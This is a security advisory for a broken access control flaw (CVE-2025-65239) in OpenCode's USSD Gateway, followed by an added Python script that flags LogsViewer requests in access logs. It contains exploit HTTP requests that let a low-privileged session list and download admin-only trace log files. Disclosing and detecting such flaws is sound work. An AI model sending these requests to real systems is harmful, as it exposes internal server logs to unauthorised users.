[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

Technical information about CVE-2025-65239 in the OpenCode USSD GW application.

Description

Broken Access Control in the USSD Gateway application offered by OpenCode Systems allows a user with low-privileged access to enumerate all the trace/error log files, which are meant to be accessible only from admin accounts.

Application Details

  • Name: USSD Gateway

  • Vendor: OpenCode Systems

  • Version: OC Release 5 - Version 6.13.11

Technical Details

  • Vulnerable Endpoint "All files": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1

  • Vulnerable Endpoint "Specific file": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log

Exploitation

The vulnerability allows a low-privileged user to enumerate the trace and error log files exactly as an admin user can.

From a low-privileged user session, send the request below:

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
HTTP/2 200 OK
Cache-Control: private-control
Pragma: no-cache
[...]

callback ( '<TABLE width="100% border=0 cellpadding="0" cellspacing=0 align=center> <TR><TD width=100% valign=top align=right> <TABLE width="100%" border=0 cellpadding=2 cellspacing=2 height=30 class=txt> <TR><TD valign="top" align=left width=70%>Directory: <b>/aux1/ocussd/trace/</b></TD> <TD valign="top" width=30% align=right class=txt><b>Server: SERVER-NAME</b></TD></TR> </table></td></TR> <tr><td align=left><p> <table width="100%" border=0 cellpadding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> <td class="txt_head" style="width: 40%; text-align: center; white-space: nowrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap;">Date</td><td class="txt_head" style="width: 10%; text-align: center; white-space: [...]

[...]

Additionally, a specific file can be retrieved using the request below:

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
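As an added detection example (it is not part of the advisory and not OpenCode's own code), the script below parses web-server access-log lines in combined log format and surfaces every request to the LogsViewer operations named above, pulling the server name and filesystem path out of op_param so that each hit can be correlated with the role behind the session. The log format, IP addresses, timestamps and file names are constructed assumptions; only the endpoint, parameter names and directory come from the advisory.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format). IPs, timestamps, sizes
# and the file name "trace_sample.log" are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2025:10:01:02 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=Dashboard HTTP/2.0" 200 512
10.0.0.7 - - [12/Nov/2025:10:01:09 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2.0" 200 8192
10.0.0.7 - - [12/Nov/2025:10:01:15 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace_sample.log HTTP/2.0" 200 65536
10.0.0.9 - - [12/Nov/2025:10:02:00 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/error/error.log HTTP/2.0" 403 0
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

CONTROL_PANEL = "/occontrolpanel/index.php"


def parse_query(qs):
    """Split a query string on '&' only; op_param legitimately contains ';'."""
    out = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        out[unquote_plus(key)] = unquote_plus(value)
    return out


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = parse_query(query)
    return rec


def is_logviewer_request(rec):
    q = rec["query"]
    return rec["path"] == CONTROL_PANEL and q.get("w") == "ocussdgw" and q.get("op") == "LogsViewer"


def describe(rec):
    """Flatten a LogsViewer hit; op_param is '<server>;<path>[;<extra>]'."""
    q = rec["query"]
    parts = q.get("op_param", "").split(";")
    return {
        "ip": rec["ip"],
        "ts": rec["ts"],
        "status": int(rec["status"]),
        "func": q.get("op_func", ""),
        "server": parts[0] if parts else "",
        "fs_path": parts[1] if len(parts) > 1 else "",
    }


def find_logviewer_access(text):
    """All LogsViewer requests in the log, whatever their status code."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_logviewer_request(rec):
            hits.append(describe(rec))
    return hits


def served_files(hits):
    """(ip, path) pairs for GetFile requests the server actually answered with 200."""
    return [(h["ip"], h["fs_path"]) for h in hits if h["func"] == "GetFile" and h["status"] == 200]


if __name__ == "__main__":
    hits = find_logviewer_access(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["func"]:<9} {h["status"]} {h["server"]} {h["fs_path"]}')
    print("files served:", served_files(hits))
```

Every LogsViewer hit is reported, including denied ones, because the access log alone cannot tell an admin session from a low-privileged one; the reviewer joins the reported IP and timestamp against the control panel's session records to decide whether a 200 on ListFiles or GetFile came from an account that should have been refused.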
